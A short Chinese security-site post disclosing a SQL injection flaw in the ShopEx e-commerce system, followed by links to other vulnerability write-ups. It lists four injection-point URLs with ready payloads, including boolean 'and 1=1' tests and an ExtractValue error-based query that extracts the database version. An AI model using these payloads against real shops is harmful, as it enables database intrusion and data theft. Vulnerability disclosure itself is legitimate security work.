注入漏洞是一种经典的漏洞类型了，自从上次跟基友深聊了注入，我对注入的认识又提升了一个高度，在我看来不可以注入的地方，TMD的竟然可以注入，注入攻击最早出现了1998年，貌似是，记不清了。10多年了，依然存在，虽然比以前出现量少了，但不得不用到的一种攻击技术…

好吧，我扯远了~~

其实注入不仅仅出现在动态页面上，难道伪静态后就不能注入了吗?NO~

不扯了，直接说主题吧，shopex网店系统注入漏洞。注入点如下：

http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html

http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html

http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html

http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html

一个是网站未开启伪静态的注入，一个是网站开启伪静态后的注入，以及是否屏蔽错误回显的2X2=4种情况。

如何注入就不多说了，10多年的东西了…不会也会了…

本文来源：SecYe安全网[http://www.secye.com] (责任编辑：SecYe安全)

• ·微软Internet Explorer浏览器Jscript.Dll
• ·CVE-2019-0708远程桌面代码执行漏洞复现
• ·Harbor任意管理员注册漏洞
• ·微软RDP远程代码执行漏洞（CVE-2019-0708
• ·有上传文件的文件名处发现的时间延迟注入
• ·Xstream远程代码执行漏洞
• ·文本编辑器VimNeovim被曝任意代码执行漏
• ·PHPCMS v9.6.0 wap模块SQL注入 | FreeBuf
• ·戴尔电脑自带系统软件SupportAssist存在R
• ·CatFish CMS V4.8.75最新版XSS漏洞审计
• ·Easy WP SMTP（v1.3.9）0 day漏洞被攻击
• ·Weblogic反序列化远程代码执行漏洞（CVE-
• ·【漏洞预警】Weblogic反序列化远程命令执
• ·ThinkPHP 5.1框架结合RCE漏洞的深入分析
• ·WordPress Core 5.0 - Remote Code Execu
• ·NetSetMan 4.7.1 - Local Buffer Overflo